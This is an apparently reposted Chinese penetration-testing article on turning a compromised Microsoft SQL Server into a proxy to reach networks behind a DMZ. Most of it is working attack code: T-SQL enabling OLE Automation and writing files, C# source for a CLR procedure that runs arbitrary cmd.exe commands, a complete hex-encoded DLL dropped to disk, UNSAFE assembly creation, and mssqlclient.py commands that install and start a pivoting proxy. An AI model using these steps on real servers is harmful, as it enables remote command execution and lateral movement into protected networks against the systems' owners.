利用MSSQL搭建代理突破DMZ访问受限网络

利用MSSQL搭建代理突破DMZ访问受限网络
2020-02-20 16:38:19 Author: mp.weixin.qq.com(查看原文) 阅读量:401 收藏

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ，前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务，例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数（标量函数和表值函数）以及用户定义的聚合函数。

0x01 环境部署

数据库服务：

演示环境：Windows Server 2008 R2 Standard

测试机地址：192.168.3.174

MSSQL版本：Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景为获取互联网侧服务器权限后，通过信息收集或者常规渗透控制 MSSQL 数据库。防火墙设置规则只允许1433端口通过，无法访问核心服务器，通过 MSSQL 数据库来构造代理，访问内部资源服务。

0x02 文件操作

开启 sp_OACreate

EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;

关闭 sp_OACreate

EXEC sp_configure 'show advanced options',1;reconfigure;EXEC sp_configure 'ole automation procedures',0;reconfigure;EXEC sp_configure 'show advanced options',0;reconfigure;

文件写入

DECLARE @o int, @f int, @t int, @ret intDECLARE @line varchar(8000)EXEC sp_OACreate 'scripting.filesystemobject',@o outEXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'

0x03 命令执行

using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using Microsoft.SqlServer.Server;using System.IO;using System.Diagnostics;using System.Text;
public partial class StoredProcedures{    [Microsoft.SqlServer.Server.SqlProcedure]    public static void cmd_exec (SqlString execCommand)    {        Process proc = new Process();        proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";        proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);        proc.StartInfo.UseShellExecute = false;        proc.StartInfo.RedirectStandardOutput = true;        proc.Start();
        // Create the record and specify the metadata for the columns.        SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));                // Mark the beginning of the result set.        SqlContext.Pipe.SendResultsStart(record);
        // Set values for each column in the row        record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
        // Send the row back to the client.        SqlContext.Pipe.SendResultsRow(record);                // Mark the end of the result set.        SqlContext.Pipe.SendResultsEnd();                proc.WaitForExit();        proc.Close();    }};

使用 csc.exe 编译 dll 文件

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs

写入编译的 dll 文件

DECLARE @ob INT;EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300f47e475e0000000000000000e00002210b010b000008000000060000000000005e270000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000042700005700000000400000a802000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e7465787400000064070000002000000008000000020000000000000000000000000000200000602e72737263000000a80200000040000000040000000a0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000000e000000000000000000000000000040000042000000000000000000000000000000004027000000000000480000000200050028210000dc050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300500c30000000100001100730400000a0a066f0500000a72010000706f0600000a00066f0500000a72390000700f00280700000a280800000a6f0900000a00066f0500000a166f0a00000a00066f0500000a176f0b00000a00066f0c00000a26178d090000010c081672490000701f0c20a00f00006a730d00000aa208730e00000a0b280f00000a076f1000000a000716066f1100000a6f1200000a6f1300000a6f1400000a00280f00000a076f1500000a00280f00000a6f1600000a00066f1700000a00066f1800000a002a1e02281900000a2a0042534a4201000100000000000c00000076342e302e33303331390000000005006c000000e0010000237e00004c0200009402000023537472696e677300000000e0040000580000002355530038050000100000002347554944000000480500009400000023426c6f620000000000000002000001471502000900000000fa253300160000010000000f000000020000000200000001000000190000000300000001000000010000000300000000000a000100000000000600380031000a0060004b000600a50085000600c50085000a000701ec000e0030011d010e0038011d0106006e0131000a00bf01ec000a00cb013f000a00d501ec000a00e301ec000a00ee01ec0006001a02100206003a0210020000000001000000000001000100010010001700000005000100010050200000000096006a000a0001001f21000000008618730010000200000001007900190073001400210073001000290073001000310073001000310049011e00390057012300110064012800410075012c0039007c01230039008a01320039009e0132003100b9013700490073003b005900730043006100f6014a006900ff014f0031002702550079004502280009004f022800590058025a00690062024f0069007102100031008002100031008c02100009007300100020001b0019002e000b006a002e00130073006000048000000000000000000000000000000000e3000000040000000000000000000000010028000000000004000000000000000000000001003f000000000004000000000000000000000001003100000000000000003c4d6f64756c653e00636d645f657863652e646c6c0053746f72656450726f63656475726573006d73636f726c69620053797374656d004f626a6563740053797374656d2e446174610053797374656d2e446174612e53716c54797065730053716c537472696e6700636d645f65786563002e63746f720065786563436f6d6d616e640053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c69747941747472696275746500636d645f65786365004d6963726f736f66742e53716c5365727665722e5365727665720053716c50726f6365647572654174747269627574650053797374656d2e446961676e6f73746963730050726f636573730050726f636573735374617274496e666f006765745f5374617274496e666f007365745f46696c654e616d65006765745f56616c756500537472696e6700466f726d6174007365745f417267756d656e7473007365745f5573655368656c6c45786563757465007365745f52656469726563745374616e646172644f75747075740053746172740053716c4d657461446174610053716c4462547970650053716c446174615265636f72640053716c436f6e746578740053716c50697065006765745f506970650053656e64526573756c747353746172740053797374656d2e494f0053747265616d526561646572006765745f5374616e646172644f757470757400546578745265616465720052656164546f456e6400546f537472696e6700536574537472696e670053656e64526573756c7473526f770053656e64526573756c7473456e640057616974466f724578697400436c6f7365000000003743003a005c00570069006e0064006f00770073005c00530079007300740065006d00330032005c0063006d0064002e00650078006500000f20002f00430020007b0030007d00000d6f00750074007000750074000000a8d1b0181bae7940aee54017db44e16a0008b77a5c561934e0890500010111090320000104200101080401000000042000121d042001010e0320000e0500020e0e1c042001010203200002072003010e11290a062001011d1225040000123505200101122d042000123905200201080e0907031219122d1d12250801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f77730100002c27000000000000000000004e270000002000000000000000000000000000000000000000000000402700000000000000000000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004c02000000000000000000004c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004ac010000010053007400720069006e006700460069006c00650049006e0066006f0000008801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e00300000003c000d00010049006e007400650072006e0061006c004e0061006d006500000063006d0064005f0065007800630065002e0064006c006c00000000002800020001004c006500670061006c0043006f00700079007200690067006800740000002000000044000d0001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000063006d0064005f0065007800630065002e0064006c006c0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000603700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000;EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;EXEC sp_OAMethod @ob, 'Close';EXEC sp_OADestroy @ob;

执行系统命令

CREATE ASSEMBLY my_assemblyFROM 'C:\windows\temp\cmd_exec.dll'WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];GO
cmd_exec 'ver'
DROP PROCEDURE cmd_execDROP ASSEMBLY my_assembly

0x04 环境测试

python mssqlclient.py administrator@192.168.3.174 -windows-auth

upload reciclador.dll C:\windows\temp\reciclador.dll

python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll

USE msdb;SELECT      SCHEMA_NAME(so.[schema_id]) AS [schema_name],             af.file_id,                          af.name + '.dll' as [file_name],            asmbly.clr_name,            asmbly.assembly_id,                       asmbly.name AS [assembly_name],             am.assembly_class,            am.assembly_method,            so.object_id as [sp_object_id],            so.name AS [sp_name],            so.[type] as [sp_type],            asmbly.permission_set_desc,            asmbly.create_date,            asmbly.modify_date,            af.content                           FROM        sys.assembly_modules amINNER JOIN  sys.assemblies asmblyON        asmbly.assembly_id = am.assembly_idINNER JOIN  sys.assembly_files af ON       asmbly.assembly_id = af.assembly_id INNER JOIN  sys.objects soON        so.[object_id] = am.[object_id]

python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"

python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"

参考文章

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNTk1NDQ3Ng==&mid=2247485007&idx=2&sn=ccbd7430303dd6e9f2ceb47bb90dbcb8&chksm=fa177a8ccd60f39aece5cae88c49b624d5c1820f1961bce052bed157d5a2d2ab6d0ff199a4a2#rd
如有侵权请联系:admin#unsafe.sh